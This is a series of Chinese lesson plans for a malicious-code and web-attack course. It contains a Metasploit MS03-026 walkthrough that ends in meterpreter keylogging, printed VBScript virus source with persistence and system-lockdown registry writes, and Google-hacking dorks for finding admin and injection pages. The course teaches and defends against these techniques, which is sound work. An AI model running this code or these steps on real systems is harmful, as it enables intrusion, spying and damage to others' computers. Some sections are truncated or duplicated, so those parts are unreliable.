(guò)程Step1：打開(kāi)攻擊機(jī)，啟動(dòng)MSFConsole。Step2：輸入“searchms03_026”命令，查詢“MS03-026漏洞”的相關(guān)信息。Step3：輸入“useexploit/windows/dcerpc/ms03_026_dcom”命令，查看“利用漏洞”程序需要設(shè)置的相關(guān)內(nèi)容。Step4：對(duì)攻擊環(huán)境進(jìn)行配置。其中：設(shè)置攻擊主機(jī)（靶機(jī)）的IP地址；設(shè)置本機(jī)（攻擊機(jī)）的IP地址；設(shè)置監(jiān)聽(tīng)端口；最后輸入“exploit”命令，會(huì)看到探測(cè)到對(duì)方的系統(tǒng)類型和語(yǔ)言版本，并且顯示已經(jīng)打開(kāi)的meterpreter會(huì)話。Step5：執(zhí)行完exploit后，就已經(jīng)獲得了一個(gè)meterpreter

shell。接下來(lái)獲取系統(tǒng)權(quán)限。Step6：meterpreter能夠獲得并記錄目標(biāo)主機(jī)上的鍵盤輸入信息，即能夠遠(yuǎn)程記錄對(duì)方在自己的計(jì)算機(jī)上輸入的信息，運(yùn)行“getuid”命令，會(huì)看到已經(jīng)具有administrator權(quán)限了。Step7：?jiǎn)?dòng)鍵盤記錄命令“keyscan_start”，開(kāi)始記錄鍵盤信息。Step8：輸入“keyscan_dump”命令，進(jìn)行鍵盤輸入信息的監(jiān)聽(tīng)。Step9：最后，輸入“keyscan_stop”命令，停止鍵盤記錄教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式理論授課日期年11月11日第11周授課時(shí)數(shù)3授課章節(jié)名稱計(jì)算機(jī)病毒、蠕蟲(chóng)、木馬以及后門教學(xué)目的與要求1.了解惡意代碼的各種類型及特征2.掌握惡意代碼之間的區(qū)別（傳播機(jī)制、工作機(jī)制）3.掌握惡意代碼的防范方法教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：掌握惡意代碼的基本特征難點(diǎn)：惡意代碼實(shí)施攻擊方式上的特點(diǎn)以及防范方法。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)什么是惡意代碼？主要包括哪些類型？具有什么基本特征？并簡(jiǎn)述各類惡意代碼的感染和傳播機(jī)制？課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)課程情境導(dǎo)入Step1：生成可監(jiān)聽(tīng)的exe執(zhí)行程序：Step2：靶機(jī)端植入iambad.exe，在攻擊端上配置PayloadHandler：Step3：靶機(jī)上雙擊剛才生成的惡意可執(zhí)行程序，攻擊端進(jìn)行連接監(jiān)聽(tīng)：?jiǎn)栴}思考示例中的iambad.exe程序，如果將這個(gè)執(zhí)行文件自行引導(dǎo)？通過(guò)什么方式設(shè)計(jì)的更為隱蔽及難以溯源？1計(jì)算機(jī)病毒1.1計(jì)算機(jī)病毒的生命周期1.2邏輯結(jié)構(gòu)及基本特征1.3計(jì)算機(jī)病毒的分類及傳播機(jī)制根據(jù)病毒所依附的宿主程序的不同，可將計(jì)算機(jī)病毒主要分為可執(zhí)行文件病毒、引導(dǎo)扇區(qū)病毒和宏病毒3種類型。一旦病毒在計(jì)算機(jī)系統(tǒng)中被觸發(fā)，它就會(huì)尋找可供感染的宿主程序位置，并復(fù)制自身并寄生在宿主身上，病毒可能依附在移動(dòng)存儲(chǔ)或硬盤的引導(dǎo)扇區(qū)，或者以嵌入代碼的文檔、可執(zhí)行文件或者腳本文件。而傳播的途徑主要有：介質(zhì)、電子郵件等。1.4計(jì)算機(jī)病毒的防范方法2蠕蟲(chóng)2.1網(wǎng)絡(luò)蠕蟲(chóng)的特征與工作機(jī)制【核心】網(wǎng)絡(luò)傳播是蠕蟲(chóng)的本質(zhì)內(nèi)容。網(wǎng)絡(luò)蠕蟲(chóng)的功能結(jié)構(gòu)包括主體功能和輔助功能兩部分。其中，主體功能包括信息搜集模塊、探測(cè)模塊、攻擊模塊和自我推進(jìn)模塊4個(gè)模塊；輔助功能包括實(shí)體隱藏模塊、宿主破壞模塊、通信模塊和自動(dòng)更新模塊4個(gè)模塊。2.2網(wǎng)絡(luò)蠕蟲(chóng)的掃描方式1、選擇性隨機(jī)掃描2、順序掃描3、目標(biāo)地址列表掃描4、基于路由的掃描5、基于DNS掃描6、分治掃描7、被動(dòng)式掃描各種掃描策略的差異主要在于目標(biāo)地址空間的選擇。網(wǎng)絡(luò)蠕蟲(chóng)感染一臺(tái)主機(jī)的時(shí)間取決于蠕蟲(chóng)搜索到易感染主機(jī)所需要的時(shí)間。因此，網(wǎng)絡(luò)蠕蟲(chóng)快速傳播的關(guān)鍵在于設(shè)計(jì)良好的掃描方式。一般情況下，采用DNS掃描傳播的蠕蟲(chóng)速度最慢，選擇性掃描和路由掃描比隨機(jī)掃描的速度要快。分治掃描目前還沒(méi)有找到易于實(shí)現(xiàn)且有效的算法2.3網(wǎng)絡(luò)蠕蟲(chóng)的防范方法3木馬3.1木馬的基本特征及隱藏技術(shù)區(qū)別：通過(guò)判別是否具有傳染性可將木馬與病毒、蠕蟲(chóng)區(qū)別開(kāi)來(lái)，通過(guò)判別傳染途徑是局限于本機(jī)還是透過(guò)網(wǎng)絡(luò)可將病毒和蠕蟲(chóng)區(qū)別開(kāi)來(lái)。木馬被植入后，通常利用各種手段來(lái)隱藏痕跡，以避免被發(fā)現(xiàn)和追蹤，隱藏技術(shù)分為以下：本地隱藏；通信隱藏；協(xié)同隱藏。每一種隱藏技術(shù)的實(shí)現(xiàn)方法不盡相同，歸納起來(lái)主要分為以下3種類型：將木馬隱藏（附著、捆綁或替換）在合法程序中；修改或替換相應(yīng)的檢測(cè)程序，對(duì)有關(guān)木馬的輸出信息進(jìn)行隱蔽處理；利用檢測(cè)程序本身工作機(jī)制或缺陷巧妙地避過(guò)木馬檢測(cè)。該方法無(wú)需修改檢測(cè)程序，就能達(dá)到隱藏的目的3.2各類型木馬1、網(wǎng)頁(yè)木馬表現(xiàn)形式：一個(gè)或一組有鏈接關(guān)系、含有（用VBScript、JavaScript等腳本語(yǔ)言編寫的）惡意代碼的HTML頁(yè)面，惡意代碼在該頁(yè)面或一組相關(guān)頁(yè)面被客戶端瀏覽器加載、渲染的過(guò)程中被執(zhí)行，并利用瀏覽器及插件中的漏洞隱蔽地下載、安裝、執(zhí)行病毒或間諜軟件等惡意可執(zhí)行文件。主要攻擊流程：2、硬件木馬對(duì)象：能夠?qū)崿F(xiàn)對(duì)專用集成電路（ASIC）、微處理器、微控制器、網(wǎng)絡(luò)處理器、數(shù)字信號(hào)處理器（DSP）等硬件的修改，也能實(shí)現(xiàn)對(duì)FPGA（field-programmablegatearray，現(xiàn)場(chǎng)可編程門陣列）比特流等固件的修改。根據(jù)硬件木馬的不同特性，從不同的角度將其分類，其中最為常見(jiàn)的分類方式有3種：組合型木馬和時(shí)序型木馬觸發(fā)和有效載荷兩部分根據(jù)硬件木馬的物理特性、激活特性和活動(dòng)特性分類3、挖礦木馬挖礦木馬的主要類型：僵尸網(wǎng)絡(luò)：專門用于挖礦的僵尸網(wǎng)絡(luò)主要有“Bondnet”、“yamMiner”、“隱匿者”。網(wǎng)頁(yè)挖礦3.3木馬的防范防范1、主機(jī)木馬的查看方法2、傳統(tǒng)木馬的防御方法3、網(wǎng)頁(yè)木馬的防御方法4后門4.1后門的功能和特點(diǎn)1、方便再次入侵2、隱藏操作痕跡3、繞過(guò)監(jiān)控系統(tǒng)4、提供惡意代碼植入手段4.2后門的分類根據(jù)實(shí)現(xiàn)方式不同，可將后門分為網(wǎng)頁(yè)后門、線程插入后門、擴(kuò)展后門、C/S后門和賬戶后門幾種類型。4.3后門的防范方法由于后門隱藏包括應(yīng)用級(jí)隱藏和內(nèi)核級(jí)隱藏，所以其檢測(cè)和防御方法也分為應(yīng)用級(jí)和內(nèi)核級(jí)2種類型。后門的應(yīng)用級(jí)檢測(cè)和防御后門的內(nèi)核級(jí)檢測(cè)和防御教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式上機(jī)授課日期年11月13日第11周授課時(shí)數(shù)3授課章節(jié)名稱實(shí)驗(yàn)：腳本病毒編寫教學(xué)目的與要求1.了解腳本與腳本病毒的基本概念。2.了解常見(jiàn)腳本病毒的工作原理、種類及特點(diǎn)。3.了解簡(jiǎn)單腳本病毒的編寫方法。4.了解常見(jiàn)腳本工具的使用方法。教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：了解腳本病毒編寫、實(shí)施攻擊的過(guò)程。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1情境設(shè)置目標(biāo)：編寫惡意腳本，破壞目標(biāo)系統(tǒng)的右鍵快捷鍵功能，并且不讓目標(biāo)系統(tǒng)用戶進(jìn)行注冊(cè)表管理。方法：在虛擬機(jī)中，使用的VBS腳本病毒生成器軟件“病毒制造機(jī)”，編寫腳本病毒，并觀察感染后的系統(tǒng)變化情況。腳本病毒的書(shū)寫形式靈活，容易產(chǎn)生變種。目前網(wǎng)絡(luò)上存在的腳本病毒絕大多數(shù)都用VBScript和JavaScript編寫。2實(shí)驗(yàn)過(guò)程2.1感染病毒并觀察感染后的系統(tǒng)變化情況。主要操作步驟如下：Step1：將生成的腳本病毒文件置于虛擬機(jī)中，雙擊使之運(yùn)行。然后，為保證完整準(zhǔn)確地查看病毒的感染效果，可重啟已經(jīng)感染了病毒的虛擬機(jī)系統(tǒng)。之后，根據(jù)病毒文件生成時(shí)的設(shè)置，觀察系統(tǒng)感染了病毒后的表現(xiàn)情況。Step2：觀察系統(tǒng)文件夾下的異常變化，可以發(fā)現(xiàn)，在C:\Windows、C:\Windows\system32下多了不明來(lái)源的腳本文件。Step3：檢查各項(xiàng)系統(tǒng)功能，發(fā)現(xiàn)右鍵快捷菜單功能被禁止。在“開(kāi)始”菜單中，“運(yùn)行”命令被去除，利用快捷鍵Win+R（“運(yùn)行”的快捷鍵），會(huì)彈出報(bào)錯(cuò)信息（如圖1）。在C:\windows下運(yùn)行注冊(cè)表管理器程序regedit.exe，同樣也會(huì)彈出報(bào)錯(cuò)信息，提示功能被禁（如圖2）。圖1系統(tǒng)報(bào)錯(cuò)信息圖2注冊(cè)表編輯器已禁用的提示信息Step4：檢查IE瀏覽器的各項(xiàng)功能，查看異常，會(huì)發(fā)現(xiàn)IE瀏覽器主頁(yè)被惡意篡改。依次單擊“菜單欄→工具→Internet

選項(xiàng)”，發(fā)現(xiàn)無(wú)法正常打開(kāi)Internet

選項(xiàng)。另外，IE瀏覽器的右鍵快捷菜單功能也被禁用。2.2腳本病毒代碼分析。分析腳本病毒的源碼，理解各條語(yǔ)句的含義。用“記事本”等文本編輯工具打開(kāi)病毒腳本，查看其代碼。代碼內(nèi)容摘錄如下：1

OnErrorResumeNext2

Setfs=CreateObject("Scripting.FileSystemObject")3

Setdir1=fs.GetSpecialFolder(0)4

Setdir2=fs.GetSpecialFolder(1)5

Setso=CreateObject("Scripting.FileSystemObject")6

dimr7

Setr=CreateObject("Wscript.Shell")8

so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")9

so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs")10

so.GetFile(WScript.ScriptFullName).Copy(dir1&"\StartMenu\Programs\啟動(dòng)\Win32system.vbs")11

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"12

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"13

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"14

r.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"15

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"16

r.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"17

r.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"18

r.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\StartPage",【解釋】第1行語(yǔ)句的含義是啟用錯(cuò)誤處理程序，目的在于為了當(dāng)程序發(fā)生錯(cuò)誤的時(shí)候忽略錯(cuò)誤而繼續(xù)向下執(zhí)行，從而不要打斷程序的執(zhí)行流程，保證后續(xù)的代碼可以繼續(xù)執(zhí)行。第3行和第4行語(yǔ)句中，使用了GetSpecialFolder(folderspec)函數(shù)，當(dāng)參數(shù)folderspec等于0時(shí)，函數(shù)返回值為Windows文件夾（一般為C:\Windows或C:\WINNT）；當(dāng)參數(shù)folderspec等于1時(shí)，函數(shù)返回值為System文件夾（常見(jiàn)于C:\Windows\system32）。第8行至第10行語(yǔ)句的作用依次為復(fù)制病毒文件夾到Windows文件夾、system32文件夾、啟動(dòng)菜單。第11行至第15行語(yǔ)句的作用依次為禁止“運(yùn)行”菜單、禁止使用注冊(cè)表編輯器、禁止注銷菜單、開(kāi)機(jī)自動(dòng)運(yùn)行以及禁止右鍵快捷菜單。第16行至第18行語(yǔ)句的作用依次為禁用IE瀏覽器右鍵菜單、禁止Internet選項(xiàng)、設(shè)置默認(rèn)主頁(yè)為。

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式理論授課日期年11月18日第12周授課時(shí)數(shù)3授課章節(jié)名稱僵尸網(wǎng)絡(luò)以及Rootkit教學(xué)目的與要求1.了解僵尸網(wǎng)絡(luò)結(jié)構(gòu)、組成及各模塊具體功能2.了解Rootkit工具集實(shí)施攻擊的幾種方式教學(xué)重點(diǎn)或教學(xué)難點(diǎn)Rootkit攻擊具體實(shí)施過(guò)程更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)簡(jiǎn)述僵尸網(wǎng)絡(luò)的工作機(jī)制，并分析其防御方法。通過(guò)對(duì)Rootkit攻擊技術(shù)的介紹，簡(jiǎn)述其檢測(cè)和防御方法。課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1僵尸網(wǎng)絡(luò)的概念僵尸網(wǎng)絡(luò)融合了傳統(tǒng)惡意代碼的優(yōu)勢(shì)，實(shí)現(xiàn)了控制功能與攻擊任務(wù)的分離，用作命令與控制的C&C服務(wù)器的搭建較為容易。1.1僵尸網(wǎng)絡(luò)結(jié)構(gòu)僵尸程序（bot）僵尸網(wǎng)絡(luò)（botnet）攻擊者（botmaster）命令與控制（commandandcontrol，C&C）1.2僵尸網(wǎng)絡(luò)結(jié)構(gòu)組成及功能在僵尸網(wǎng)絡(luò)中，根據(jù)攻擊過(guò)程中所發(fā)揮功能的不同，可以將僵尸程序的功能模塊分為主體功能模塊和輔助功能模塊兩部分。1.3僵尸網(wǎng)絡(luò)的工作機(jī)制及特點(diǎn)基于IRC協(xié)議的僵尸網(wǎng)絡(luò)的工作機(jī)制如圖：1.4僵尸網(wǎng)絡(luò)的防御與反制2Rootkit2.1概念Rootkit是攻擊者使用的一個(gè)軟件工具集，用于獲得對(duì)系統(tǒng)的非授權(quán)訪問(wèn)，為攻擊者獲取敏感數(shù)據(jù)提供特殊權(quán)限，并隱藏自己的存在，而且根據(jù)需要允許安裝其他惡意軟件，是能夠獲得系統(tǒng)特權(quán)并能夠控制整個(gè)系統(tǒng)的工具集。例：以Windows為例具體進(jìn)行討論：要存在能夠掛鉤的地方都可以實(shí)現(xiàn)基于掛鉤的Rootkit攻擊。從理論上講，不管是用戶模式還是內(nèi)核模式，只要存在能夠掛鉤的地方都可以實(shí)現(xiàn)基于掛鉤的Rootkit攻擊。1、掛鉤Windows環(huán)境下主要有兩種實(shí)現(xiàn)API函數(shù)掛鉤的操作：一種是通過(guò)修改PE（PortableExecutable，可移植執(zhí)行體）文件的IAT（ImportAddressTable，輸入地址表）使API函數(shù)地址重定向，該方式稱為IATHooking（基于IAT表的掛鉤），圖1為IATHooking工作過(guò)程。圖1一種是篡改API函數(shù)地址中的機(jī)器碼，即用無(wú)條件跳轉(zhuǎn)指令JMP的機(jī)器碼來(lái)替換API函數(shù)入口地址中的機(jī)器碼，該方式稱為InlineHooking，圖2為InlineHooking的工作過(guò)程。圖22、DKOM技術(shù)DKOM（DirectKernelObjectManipulation，直接內(nèi)核對(duì)象操作）Rootkit攻擊與掛鉤攻擊區(qū)別：API函數(shù)掛鉤攻擊和描述符表掛鉤攻擊都是利用被攻擊對(duì)象的工作機(jī)制，通過(guò)修改程序執(zhí)行流程或重定向指令等方式來(lái)實(shí)現(xiàn)Rootkit攻擊；DKOMRootkit攻擊技術(shù)通過(guò)直接修改Windows系統(tǒng)的設(shè)備驅(qū)動(dòng)程序或可加載內(nèi)核模塊，以實(shí)現(xiàn)進(jìn)程、文件和網(wǎng)絡(luò)連接的隱藏和進(jìn)程提權(quán)。3、虛擬化技術(shù)2.2Rootkit檢測(cè)方法Rootkit的檢測(cè)方法可分為基于軟件的檢測(cè)法和基于硬件的檢測(cè)法2種類型。1、基于軟件的檢測(cè)法基于軟件的檢測(cè)法分為行為檢測(cè)法、完整性檢測(cè)法、執(zhí)行時(shí)間檢測(cè)法、執(zhí)行路徑檢測(cè)性和差異檢測(cè)法幾種類型。2、基于硬件的檢測(cè)法2.3Rootkit防范技術(shù)1、固件級(jí)防御2、內(nèi)核級(jí)防御3、用戶級(jí)防御4、虛擬級(jí)防御教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式實(shí)驗(yàn)授課日期年11月20日第12周授課時(shí)數(shù)3授課章節(jié)名稱惡意網(wǎng)頁(yè)攻擊教學(xué)目的與要求1.腳本的特征和編寫方法。2.網(wǎng)頁(yè)病毒的特征和攻擊方式。3.網(wǎng)頁(yè)病毒的安全防范方法。教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：網(wǎng)頁(yè)病毒觸發(fā)的過(guò)程。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1情境設(shè)置目標(biāo)：編寫網(wǎng)頁(yè)惡意腳本，通過(guò)誘使受騙用戶來(lái)訪問(wèn)該網(wǎng)頁(yè)，進(jìn)而在目標(biāo)系統(tǒng)中執(zhí)行該網(wǎng)頁(yè)腳本并寫入惡意文件。方法：在虛擬機(jī)中，編寫網(wǎng)頁(yè)腳本病毒，并觀察執(zhí)行腳本前后系統(tǒng)變化情況。網(wǎng)頁(yè)病毒。網(wǎng)頁(yè)病毒是利用網(wǎng)頁(yè)進(jìn)行攻擊的一類惡意代碼。根據(jù)網(wǎng)頁(yè)病毒能夠以各種方式自動(dòng)執(zhí)行的特性，而且其根源是它完全不受用戶的控制。當(dāng)用戶一旦瀏覽了含有惡意代碼的網(wǎng)頁(yè)，惡意代碼就會(huì)自動(dòng)執(zhí)行，給用戶端計(jì)算機(jī)帶來(lái)不同程度的破壞或影響。嘗試通過(guò)以下的形式誘使用戶來(lái)訪問(wèn)：構(gòu)造容易記憶的網(wǎng)頁(yè)名稱利用瀏覽者的獵奇或貪婪心理無(wú)意識(shí)的瀏覽者2實(shí)驗(yàn)過(guò)程主要操作步驟如下：Step1：以administrator身份登錄實(shí)用中的計(jì)算機(jī)操作系統(tǒng)。用“記事本”等文本編輯工具打開(kāi)“創(chuàng)建.txt”文件，將顯示如圖1所示的執(zhí)行腳本的內(nèi)容。圖1Step2：打開(kāi)C盤，查看C盤下是否有“test.htm”文件。修改“創(chuàng)建.txt”文件的類型為.HTM，然后單擊運(yùn)行。當(dāng)出現(xiàn)的提示信息時(shí)，單擊“確定”按鈕，允許阻止的內(nèi)容的運(yùn)行。隨后，出現(xiàn)如圖2所示的空白顯示頁(yè)面。圖2Step3：重新查看C盤，就會(huì)發(fā)現(xiàn)存在一個(gè)名為“test.htm”的文件，如圖3所示。圖3說(shuō)明通過(guò)在瀏覽器中運(yùn)行“創(chuàng)建.htm”文件后，在C盤下自動(dòng)創(chuàng)建了一個(gè)名為“test.htm”的文件。Step4：打開(kāi)D:\tools文件夾中的“修改.txt”文件，此文件主要對(duì)前面已經(jīng)創(chuàng)建的“test.htm”文件的內(nèi)容進(jìn)行修改，“修改.txt”文件的內(nèi)容如圖4所示。圖4Step5：修改“修改.txt”文件的類型為.HTM，然后單擊該文件使之運(yùn)行，當(dāng)出現(xiàn)類似安全提示信息時(shí)，選擇“允許阻止的內(nèi)容”，并在出現(xiàn)的對(duì)話框中直接單擊“是”，允許該文件在瀏覽器中打開(kāi)。Step6：當(dāng)“修改.htm”運(yùn)行結(jié)束后，再運(yùn)行C盤中的“test.htm”文件，將出現(xiàn)如圖5所示的頁(yè)面，說(shuō)明修改文件內(nèi)容成功。圖5（詳細(xì)步驟參見(jiàn)實(shí)驗(yàn)報(bào)告內(nèi)容）教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式理論授課日期年11月25日第13周授課時(shí)數(shù)3授課章節(jié)名稱Web應(yīng)用的結(jié)構(gòu)、針對(duì)Web服務(wù)器的信息收集教學(xué)目的與要求1.了解僵尸網(wǎng)絡(luò)結(jié)構(gòu)、組成及各模塊具體功能2.了解Rootkit工具集實(shí)施攻擊的幾種方式教學(xué)重點(diǎn)或教學(xué)難點(diǎn)Rootkit攻擊具體實(shí)施過(guò)程更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)簡(jiǎn)述僵尸網(wǎng)絡(luò)的工作機(jī)制，并分析其防御方法。通過(guò)對(duì)Rootkit攻擊技術(shù)的介紹，簡(jiǎn)述其檢測(cè)和防御方法。課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1Web服務(wù)器的信息收集1.1收集的信息內(nèi)容針對(duì)Web服務(wù)器的攻擊，可收集的信息主要包括以下幾類：地址信息。包括：服務(wù)器的IP地址，DNS域名，打開(kāi)的端口號(hào)以及對(duì)應(yīng)的服務(wù)進(jìn)程等。系統(tǒng)信息。包括：操作系統(tǒng)類型及版本，Web服務(wù)器軟件類型及版本，Web應(yīng)用程序及版本，Web應(yīng)用程序的開(kāi)發(fā)工具及版本，Web應(yīng)用程序架構(gòu)（是靜態(tài)HTML頁(yè)面，還是PHP、APS、JSP動(dòng)態(tài)頁(yè)面等），數(shù)據(jù)庫(kù)管理系統(tǒng)的類型及版本等賬戶信息。包括：操作系統(tǒng)的登錄賬戶，數(shù)據(jù)庫(kù)管理系統(tǒng)的賬戶，應(yīng)用系統(tǒng)的管理賬戶等。配置信息。包括：網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)，地址映射表（當(dāng)Web服務(wù)器位于內(nèi)部局域網(wǎng)中使用私有IP地址時(shí)），服務(wù)配置信息，共享資源，防火墻類型及配置信息，身份認(rèn)證與訪問(wèn)控制方式，加密及密碼管理機(jī)制等。其他信息。包括：安全漏洞（軟件漏洞和管理漏洞），DNS注冊(cè)信息，網(wǎng)絡(luò)管理員聯(lián)系方式等。1.2網(wǎng)絡(luò)掃描先通過(guò)“主機(jī)掃描”發(fā)現(xiàn)目標(biāo)網(wǎng)絡(luò)中存在的活躍主機(jī)，然后通過(guò)“端口掃描”找出活躍主機(jī)上所開(kāi)放的端口及對(duì)應(yīng)的網(wǎng)絡(luò)服務(wù)，接著通過(guò)“系統(tǒng)類型探測(cè)”確定攻擊主機(jī)的操作系統(tǒng)類型及版本號(hào)，最后通過(guò)“漏洞掃描”找到攻擊主機(jī)上存在的安全漏洞。1、主機(jī)掃描基于ICMP協(xié)議的掃描方法甚至TCP協(xié)議的主機(jī)掃描方法基于UDP協(xié)議的主機(jī)掃描方法2、端口掃描連接掃描SYN掃描UDP端口掃描3、系統(tǒng)類型探測(cè)操作系統(tǒng)類型探測(cè)網(wǎng)絡(luò)服務(wù)類型探測(cè)1.3漏洞掃描1、漏洞掃描的原理2、漏洞掃描器安全漏洞數(shù)據(jù)庫(kù)掃描引擎模塊用戶配置控制臺(tái)掃描進(jìn)程控制模塊結(jié)果存儲(chǔ)與報(bào)告生成模塊1.4針對(duì)Web服務(wù)器信息收集的防范方法2Rootkit2.1概念Rootkit是攻擊者使用的一個(gè)軟件工具集，用于獲得對(duì)系統(tǒng)的非授權(quán)訪問(wèn)，為攻擊者獲取敏感數(shù)據(jù)提供特殊權(quán)限，并隱藏自己的存在，而且根據(jù)需要允許安裝其他惡意軟件，是能夠獲得系統(tǒng)特權(quán)并能夠控制整個(gè)系統(tǒng)的工具集。例：以Windows為例具體進(jìn)行討論：要存在能夠掛鉤的地方都可以實(shí)現(xiàn)基于掛鉤的Rootkit攻擊。從理論上講，不管是用戶模式還是內(nèi)核模式，只要存在能夠掛鉤的地方都可以實(shí)現(xiàn)基于掛鉤的Rootkit攻擊。1、掛鉤Windows環(huán)境下主要有兩種實(shí)現(xiàn)API函數(shù)掛鉤的操作：一種是通過(guò)修改PE（PortableExecutable，可移植執(zhí)行體）文件的IAT（ImportAddressTable，輸入地址表）使API函數(shù)地址重定向，該方式稱為IATHoo教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式實(shí)驗(yàn)授課日期年11月27日第13周授課時(shí)數(shù)3授課章節(jié)名稱信息搜集、漏洞掃描以及網(wǎng)絡(luò)嗅探教學(xué)目的與要求1.掌握信息收集的各類工具使用2.掌握漏洞掃描的各類工具使用3.綜合以上工具，獲取滲透攻擊前期的信息收集工作教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：各個(gè)工具的結(jié)合使用，收集有價(jià)值可利用的信息。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)對(duì)常見(jiàn)的Dedecms、Discuz！進(jìn)行漏洞信息收集在互聯(lián)網(wǎng)上收集自己的各類信息課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1情境設(shè)置目標(biāo)：某黑客想攻破某招生網(wǎng)站，獲取考生信息，現(xiàn)針對(duì)該招生web站點(diǎn)，收集其相關(guān)信息：域名、ip地址、子域名、網(wǎng)站指紋、系統(tǒng)端口、系統(tǒng)漏洞、內(nèi)網(wǎng)拓?fù)?。方法：通過(guò)信息收集相關(guān)工具，依次對(duì)以上信息進(jìn)行收集。2信息收集實(shí)驗(yàn)2.1利用搜索引擎收集信息除了Googlehacking技術(shù)外，其他現(xiàn)階段的bing、百度、搜狗、360都有相應(yīng)的高級(jí)搜索功能。其實(shí)利用的就是搜索引擎對(duì)構(gòu)造特殊關(guān)鍵，進(jìn)行快速全面的挖掘出有價(jià)值的信息。例：利用搜索引擎提供的語(yǔ)法，后面加上filetype:pdf那么這個(gè)語(yǔ)法就是搜索以googlehacking為標(biāo)題的pdf文件。這時(shí)候搜索引擎返回的結(jié)果中含有大量的pdf文件。常用GoogleHacking語(yǔ)法：intext：（僅對(duì)Google有效）把網(wǎng)頁(yè)的正文內(nèi)容中的某個(gè)字符作為搜索的條件intitle：把網(wǎng)頁(yè)標(biāo)題中的某個(gè)字符作為搜索的條件cache：搜索搜索引擎里關(guān)于某些內(nèi)容的緩存，可能會(huì)在過(guò)期內(nèi)容中發(fā)現(xiàn)有價(jià)值的信息filetype：指定一個(gè)格式類型的文件作為搜索對(duì)象inurl：搜索包含指定字符的URLsite：在指定的站點(diǎn)搜索相關(guān)內(nèi)容典型用法：找管理后臺(tái)地址site:intext:管理|后臺(tái)|登陸|用戶名|密碼|系統(tǒng)|賬號(hào)site:inurl:login/admin/manager/admin_login/systemsite:intitle:管理|后臺(tái)|登陸找上傳類漏洞：site:inurl:filesite:inurl:upload找注入頁(yè)面：site:inurl:php?id=site:inurl:asp?id=找編輯器頁(yè)面：site:inurl:webeditor2.2通過(guò)目標(biāo)站點(diǎn)收集信息主要目標(biāo)有：目標(biāo)站點(diǎn)使用的技術(shù)（頁(yè)面、數(shù)據(jù)庫(kù)等）目標(biāo)站點(diǎn)的whois信息，是否可能存在旁站等挖掘目標(biāo)站點(diǎn)可能使用的網(wǎng)絡(luò)安全配置挖掘目標(biāo)企業(yè)機(jī)構(gòu)可能存在的管理架構(gòu)使用站長(zhǎng)工具對(duì)目標(biāo)站點(diǎn)進(jìn)行初步掃描其他與目標(biāo)站點(diǎn)相關(guān)的信息使用站長(zhǎng)工具對(duì)目標(biāo)站點(diǎn)進(jìn)行信息收集：IP查詢同IP網(wǎng)站查詢WHOIS查詢和反查子域名查詢識(shí)別服務(wù)器類型、頁(yè)面類型DNS信息查詢網(wǎng)站安全檢測(cè)端口掃描2.3漏洞信息收集信息漏洞平臺(tái)是很好的信息收集平臺(tái)，能夠通過(guò)公開(kāi)的漏洞報(bào)告了解目標(biāo)的各項(xiàng)信息，常用的漏洞平臺(tái)如下。CVE漏洞庫(kù)360補(bǔ)天漏洞平臺(tái)Exploit-DBGHDB中國(guó)國(guó)家信息安全漏洞庫(kù)國(guó)家信息安全漏洞共享平臺(tái)2.4工具收集信息常用的DOS命令：ping：網(wǎng)絡(luò)連通測(cè)試arp：顯示和修改地址解析協(xié)議tracert：顯示路由nslookup：域名系統(tǒng)查詢telnet：測(cè)試是否開(kāi)啟遠(yuǎn)程連接netstat：查看本地機(jī)器所有開(kāi)放端口ftp：測(cè)試開(kāi)放了ftp的遠(yuǎn)程主機(jī)net：最重要的命令，需要透徹掌握每一個(gè)子命令常用的掃描工具：AWVSAppScanZenmapLayer御劍DirbusterwwwsacnMaltegoShodan/Zoomeyewhatweb使用瀏覽器內(nèi)置功能和插件：常用的瀏覽器有GoogleChrome/Firefox/IE/遨游，以FireFox為例，有如下插件：showIP插件HttpFox插件CookieWatcher插件HeaderSp